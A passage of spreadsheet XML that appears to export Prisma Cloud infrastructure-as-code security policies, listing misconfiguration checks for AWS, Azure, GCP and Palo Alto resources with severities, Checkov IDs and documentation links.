        </is>
      </c>
      <c r="K1437" t="inlineStr">
        <is>
          <t>Security zone on Palo Alto Networks devices does not have an associated Zone Protection Profile</t>
        </is>
      </c>
      <c r="L1437" t="inlineStr"/>
      <c r="M1437" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1437" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1437" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1437" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1437" t="inlineStr"/>
      <c r="R1437" t="inlineStr"/>
      <c r="S1437" t="inlineStr"/>
      <c r="T1437" t="b">
        <v>0</v>
      </c>
      <c r="U1437" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1437" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-zone</t>
        </is>
      </c>
      <c r="W1437" t="inlineStr">
        <is>
          <t>Ensure a Zone Protection Profile is defined within Security Zones</t>
        </is>
      </c>
      <c r="X1437" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-14</t>
        </is>
      </c>
      <c r="Y1437" t="inlineStr"/>
      <c r="Z1437" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_zone"]}</t>
        </is>
      </c>
      <c r="AA1437" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1437" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1437" t="inlineStr">
        <is>
          <t>CKV_PAN_14</t>
        </is>
      </c>
      <c r="AD1437" t="b">
        <v>1</v>
      </c>
      <c r="AE1437" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1437" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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7" t="inlineStr">
        <is>
          <t>02fa23be-abce-4ebb-b1a7-ba420dfe43a4</t>
        </is>
      </c>
      <c r="AI1437" t="inlineStr"/>
      <c r="AJ1437" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1437" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1438">
      <c r="A1438" t="inlineStr"/>
      <c r="B1438" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1438" s="2" t="inlineStr"/>
      <c r="D1438" t="inlineStr"/>
      <c r="E1438" t="inlineStr"/>
      <c r="F1438" t="inlineStr"/>
      <c r="G1438" t="b">
        <v>1</v>
      </c>
      <c r="H14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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1438" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-zone</t>
        </is>
      </c>
      <c r="K1438" t="inlineStr">
        <is>
          <t>Include ACL (Access Control List) not defined for a security zone in Palo Alto Networks devices with User-ID enabled</t>
        </is>
      </c>
      <c r="L1438" t="inlineStr"/>
      <c r="M1438" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1438" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1438" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1438" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1438" t="inlineStr"/>
      <c r="R1438" t="inlineStr"/>
      <c r="S1438" t="inlineStr"/>
      <c r="T1438" t="b">
        <v>0</v>
      </c>
      <c r="U1438" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1438" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-zone</t>
        </is>
      </c>
      <c r="W1438" t="inlineStr">
        <is>
          <t>Ensure an Include ACL is defined for a Zone when User-ID is enabled</t>
        </is>
      </c>
      <c r="X1438" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-15</t>
        </is>
      </c>
      <c r="Y1438" t="inlineStr"/>
      <c r="Z1438" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_zone"]}</t>
        </is>
      </c>
      <c r="AA1438" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1438" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1438" t="inlineStr">
        <is>
          <t>CKV_PAN_15</t>
        </is>
      </c>
      <c r="AD1438" t="b">
        <v>1</v>
      </c>
      <c r="AE1438" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1438" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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8" t="inlineStr">
        <is>
          <t>40b52b48-d7e9-40c1-9245-15c3093f2f23</t>
        </is>
      </c>
      <c r="AI1438" t="inlineStr"/>
      <c r="AJ1438" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1438" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1439">
      <c r="A1439" t="inlineStr"/>
      <c r="B1439" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1439" s="2" t="inlineStr"/>
      <c r="D1439" t="inlineStr"/>
      <c r="E1439" t="inlineStr"/>
      <c r="F1439" t="inlineStr"/>
      <c r="G1439" t="b">
        <v>1</v>
      </c>
      <c r="H14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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1439" t="inlineStr">
        <is>
          <t>IaC:Public:aws-api</t>
        </is>
      </c>
      <c r="K1439" t="inlineStr">
        <is>
          <t>AWS API gateway methods are publicly accessible</t>
        </is>
      </c>
      <c r="L1439" t="inlineStr"/>
      <c r="M1439" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1439" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1439" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1439" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1439" t="inlineStr"/>
      <c r="R1439" t="inlineStr"/>
      <c r="S1439" t="inlineStr"/>
      <c r="T1439" t="b">
        <v>0</v>
      </c>
      <c r="U1439" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1439" t="inlineStr">
        <is>
          <t>IaC:Public:aws-api-gateway-method</t>
        </is>
      </c>
      <c r="W1439" t="inlineStr">
        <is>
          <t>Ensure there is no open access to back-end resources through API</t>
        </is>
      </c>
      <c r="X1439" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/public-policies/public-6-api-gateway-authorizer-set</t>
        </is>
      </c>
      <c r="Y1439" t="inlineStr"/>
      <c r="Z1439" t="inlineStr">
        <is>
          <t>{"category":"Public","resourceTypes":["aws_api_gateway_method"]}</t>
        </is>
      </c>
      <c r="AA1439" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1439" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1439" t="inlineStr">
        <is>
          <t>CKV_AWS_59</t>
        </is>
      </c>
      <c r="AD1439" t="b">
        <v>1</v>
      </c>
      <c r="AE1439" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1439" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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39" t="inlineStr">
        <is>
          <t>7cc87c0f-aeb7-4397-9ee7-c90eaf24e770</t>
        </is>
      </c>
      <c r="AI1439" t="inlineStr"/>
      <c r="AJ1439" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1439" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1440">
      <c r="A1440" t="inlineStr"/>
      <c r="B1440" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1440" s="2" t="inlineStr"/>
      <c r="D1440" t="inlineStr"/>
      <c r="E1440" t="inlineStr"/>
      <c r="F1440" t="inlineStr"/>
      <c r="G1440" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1440" t="inlineStr">
        <is>
          <t>IaC:Public:aws-instance,aws</t>
        </is>
      </c>
      <c r="K1440" t="inlineStr">
        <is>
          <t>AWS EC2 instances with public IP and associated with security groups have Internet access</t>
        </is>
      </c>
      <c r="L1440" t="inlineStr"/>
      <c r="M1440" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1440" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1440" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1440" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1440" t="inlineStr"/>
      <c r="R1440" t="inlineStr"/>
      <c r="S1440" t="inlineStr"/>
      <c r="T1440" t="b">
        <v>0</v>
      </c>
      <c r="U1440" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1440" t="inlineStr">
        <is>
          <t>IaC:Public:aws-instance,aws-launch-template</t>
        </is>
      </c>
      <c r="W1440" t="inlineStr">
        <is>
          <t>EC2 instance should not have public IP</t>
        </is>
      </c>
      <c r="X1440" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/public-policies/public-12</t>
        </is>
      </c>
      <c r="Y1440" t="inlineStr"/>
      <c r="Z1440" t="inlineStr">
        <is>
          <t>{"category":"Public","resourceTypes":["aws_instance", "aws_launch_template"]}</t>
        </is>
      </c>
      <c r="AA1440" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1440" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1440" t="inlineStr">
        <is>
          <t>CKV_AWS_88</t>
        </is>
      </c>
      <c r="AD1440" t="b">
        <v>1</v>
      </c>
      <c r="AE1440" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1440" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>2c2fb17b-b4bf-4fdd-bada-e7c510e2649e</t>
        </is>
      </c>
      <c r="AI1440" t="inlineStr"/>
      <c r="AJ1440" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1440" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1441">
      <c r="A1441" t="inlineStr"/>
      <c r="B1441" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1441" s="2" t="inlineStr"/>
      <c r="D1441" t="inlineStr"/>
      <c r="E1441" t="inlineStr"/>
      <c r="F1441" t="inlineStr"/>
      <c r="G1441" t="b">
        <v>1</v>
      </c>
      <c r="H14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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1441" t="inlineStr">
        <is>
          <t>IaC:Public:azure-mariadb</t>
        </is>
      </c>
      <c r="K1441" t="inlineStr">
        <is>
          <t>MariaDB servers do not have public network access enabled set to False</t>
        </is>
      </c>
      <c r="L1441" t="inlineStr"/>
      <c r="M1441" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1441" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1441" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1441" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1441" t="inlineStr"/>
      <c r="R1441" t="inlineStr"/>
      <c r="S1441" t="inlineStr"/>
      <c r="T1441" t="b">
        <v>0</v>
      </c>
      <c r="U1441" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1441" t="inlineStr">
        <is>
          <t>IaC:Public:azure-mariadb-server</t>
        </is>
      </c>
      <c r="W1441" t="inlineStr">
        <is>
          <t>Ensure 'public network access enabled' is set to 'False' for MariaDB servers</t>
        </is>
      </c>
      <c r="X1441" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/public-policies-1/bc-azr-public-1</t>
        </is>
      </c>
      <c r="Y1441" t="inlineStr"/>
      <c r="Z1441" t="inlineStr">
        <is>
          <t>{"category":"Public","resourceTypes":["azurerm_mariadb_server"]}</t>
        </is>
      </c>
      <c r="AA1441" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1441" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1441" t="inlineStr">
        <is>
          <t>CKV_AZURE_48</t>
        </is>
      </c>
      <c r="AD1441" t="b">
        <v>1</v>
      </c>
      <c r="AE1441" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1441" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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1" t="inlineStr">
        <is>
          <t>c9a786ca-5dc6-4a66-a303-3f9c0a863b52</t>
        </is>
      </c>
      <c r="AI1441" t="inlineStr"/>
      <c r="AJ1441" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1441" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1442">
      <c r="A1442" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1442" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1442" s="2" t="inlineStr"/>
      <c r="D1442" t="inlineStr"/>
      <c r="E1442" t="inlineStr"/>
      <c r="F1442" t="inlineStr"/>
      <c r="G1442" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1442" t="inlineStr">
        <is>
          <t>IaC:Public:google-storage</t>
        </is>
      </c>
      <c r="K1442" t="inlineStr">
        <is>
          <t>GCP Storage bucket is anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="L1442" t="inlineStr"/>
      <c r="M1442" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1442" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1442" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1442" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1442" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1442" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1442" t="inlineStr"/>
      <c r="T1442" t="b">
        <v>0</v>
      </c>
      <c r="U1442" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1442" t="inlineStr">
        <is>
          <t>IaC:Public:google-storage-bucket-iam-member,google-storage-bucket-iam-binding</t>
        </is>
      </c>
      <c r="W1442" t="inlineStr">
        <is>
          <t>Ensure that Cloud Storage bucket is not anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="X1442" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/bc-gcp-public-1</t>
        </is>
      </c>
      <c r="Y1442" t="inlineStr"/>
      <c r="Z1442" t="inlineStr">
        <is>
          <t>{"category":"Public","resourceTypes":["google_storage_bucket_iam_member","google_storage_bucket_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA1442" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1442" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1442" t="inlineStr">
        <is>
          <t>CKV_GCP_28</t>
        </is>
      </c>
      <c r="AD1442" t="b">
        <v>1</v>
      </c>
      <c r="AE1442" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1442" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>02ea95c9-ad87-4c3d-b66e-2dc5ef4a8fe9</t>
        </is>
      </c>
      <c r="AI1442" t="inlineStr"/>
      <c r="AJ1442" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1442" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1443">
      <c r="A1443" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 3)</t>
        </is>
      </c>
      <c r="B1443" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1443" s="2" t="inlineStr"/>
      <c r="D1443" t="inlineStr"/>
      <c r="E1443" t="inlineStr"/>
      <c r="F1443" t="inlineStr"/>
      <c r="G1443" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1443" t="inlineStr">
        <is>
          <t>IaC:Serverless:aws-lambda</t>
        </is>
      </c>
      <c r="K1443" t="inlineStr">
        <is>
          <t>AWS Lambda functions with tracing not enabled</t>
        </is>
      </c>
      <c r="L1443" t="inlineStr"/>
      <c r="M1443" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1443" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1443" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1443" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1443" t="inlineStr">
        <is>
          <t>8.1.5</t>
        </is>
      </c>
      <c r="R1443" t="inlineStr">
        <is>
          <t>8.1.5.4</t>
        </is>
      </c>
      <c r="S1443" t="inlineStr"/>
      <c r="T1443" t="b">
        <v>0</v>
      </c>
      <c r="U1443" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1443" t="inlineStr">
        <is>
          <t>IaC:Serverless:aws-lambda-function</t>
        </is>
      </c>
      <c r="W1443" t="inlineStr">
        <is>
          <t>Ensure X-ray tracing is enabled for Lambda</t>
        </is>
      </c>
      <c r="X1443" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-4</t>
        </is>
      </c>
      <c r="Y1443" t="inlineStr"/>
      <c r="Z1443" t="inlineStr">
        <is>
          <t>{"category":"Serverless","resourceTypes":["aws_lambda_function"]}</t>
        </is>
      </c>
      <c r="AA1443" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1443" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1443" t="inlineStr">
        <is>
          <t>CKV_AWS_50</t>
        </is>
      </c>
      <c r="AD1443" t="b">
        <v>1</v>
      </c>
      <c r="AE1443" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1443" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>e38f45e2-eed5-4617-bbe8-3619b21dd419</t>
        </is>
      </c>
      <c r="AI1443" t="inlineStr"/>
      <c r="AJ1443" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1443" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1444">
      <c r="A1444" t="inlineStr"/>
      <c r="B1444" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1444" s="2" t="inlineStr"/>
      <c r="D1444" t="inlineStr"/>
      <c r="E1444" t="inlineStr"/>
      <c r="F1444" t="inlineStr"/>
      <c r="G1444" t="b">
        <v>1</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1444" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-docdb</t>
        </is>
      </c>
      <c r="K1444" t="inlineStr">
        <is>
          <t>DocDB does not have audit logs enabled</t>
        </is>
      </c>
      <c r="L1444" t="inlineStr"/>
      <c r="M1444" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1444" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1444" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1444" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1444" t="inlineStr"/>
      <c r="R1444" t="inlineStr"/>
      <c r="S1444" t="inlineStr"/>
      <c r="T1444" t="b">
        <v>0</v>
      </c>
      <c r="U1444" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1444" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-docdb-cluster-parameter-group</t>
        </is>
      </c>
      <c r="W1444" t="inlineStr">
        <is>
          <t>Ensure DocDB has audit logs enabled</t>
        </is>
      </c>
      <c r="X1444" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-docdb-has-audit-logs-enabled</t>
        </is>
      </c>
      <c r="Y1444" t="inlineStr"/>
      <c r="Z1444" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_docdb_cluster_parameter_group"]}</t>
        </is>
      </c>
      <c r="AA1444" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1444" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1444" t="inlineStr">
        <is>
          <t>CKV_AWS_104</t>
        </is>
      </c>
      <c r="AD1444" t="b">
        <v>1</v>
      </c>
      <c r="AE1444" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1444" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>3d19b0c1-6479-47dc-b5c1-f9137fb90683</t>
        </is>
      </c>
      <c r="AI1444" t="inlineStr"/>
      <c r="AJ1444" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1444" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1445">
      <c r="A1445" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (AWS)</t>
        </is>
      </c>
      <c r="B1445" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1445" s="2" t="inlineStr"/>
      <c r="D1445" t="inlineStr"/>
      <c r="E1445" t="inlineStr"/>
      <c r="F1445" t="inlineStr"/>
      <c r="G1445" t="b">
        <v>0</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1445" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1445" t="inlineStr">
        <is>
          <t>S3 Bucket ACL where a log -delivery-write is not recomended</t>
        </is>
      </c>
      <c r="L1445" t="inlineStr"/>
      <c r="M1445" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1445" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1445" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1445" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1445" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R1445" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="S1445" t="inlineStr"/>
      <c r="T1445" t="b">
        <v>0</v>
      </c>
      <c r="U1445" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1445" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1445" t="inlineStr">
        <is>
          <t>The log Delivery group gets WRITE and READ_ACP permission on the bucket, thus cloud allow access to sensitive data</t>
        </is>
      </c>
      <c r="X1445" t="inlineStr"/>
      <c r="Y1445" t="inlineStr"/>
      <c r="Z1445" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket"],"conditionQuery":{"attribute":"acl","operator":"not_equals","value":"log-delivery-write","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA1445" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1445" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1445" t="inlineStr"/>
      <c r="AD1445" t="b">
        <v>0</v>
      </c>
      <c r="AE1445" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1445" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>62fab3dd-9451-48d2-9795-3032b645ca62</t>
        </is>
      </c>
      <c r="AI1445" t="inlineStr"/>
      <c r="AJ1445" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1445" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1446">
      <c r="A1446" t="inlineStr"/>
      <c r="B1446" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1446" s="2" t="inlineStr"/>
      <c r="D1446" t="inlineStr"/>
      <c r="E1446" t="inlineStr"/>
      <c r="F1446" t="inlineStr"/>
      <c r="G1446" t="b">
        <v>0</v>
      </c>
      <c r="H14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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1446" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1446" t="inlineStr">
        <is>
          <t>test : s3 bucket must have tags</t>
        </is>
      </c>
      <c r="L1446" t="inlineStr"/>
      <c r="M1446" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1446" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1446" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1446" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1446" t="inlineStr"/>
      <c r="R1446" t="inlineStr"/>
      <c r="S1446" t="inlineStr">
        <is>
          <t>s3tag</t>
        </is>
      </c>
      <c r="T1446" t="b">
        <v>0</v>
      </c>
      <c r="U1446" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1446" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1446" t="inlineStr"/>
      <c r="X1446" t="inlineStr"/>
      <c r="Y1446" t="inlineStr"/>
      <c r="Z1446" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket"],"conditionQuery":{"attribute":"tags","operator":"exists","value":"","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA1446" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1446" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1446" t="inlineStr"/>
      <c r="AD1446" t="b">
        <v>0</v>
      </c>
      <c r="AE1446" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1446" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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6" t="inlineStr">
        <is>
          <t>4a9eb82a-5d0a-4569-98e9-af48f1963250</t>
        </is>
      </c>
      <c r="AI1446" t="inlineStr"/>
      <c r="AJ1446" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1446" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1447">
      <c r="A1447" t="inlineStr"/>
      <c r="B1447" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1447" s="2" t="inlineStr"/>
      <c r="D1447" t="inlineStr"/>
      <c r="E1447" t="inlineStr"/>
      <c r="F1447" t="inlineStr"/>
      <c r="G1447" t="b">
        <v>0</v>
      </c>
      <c r="H14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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1447" t="inlineStr">
        <is>
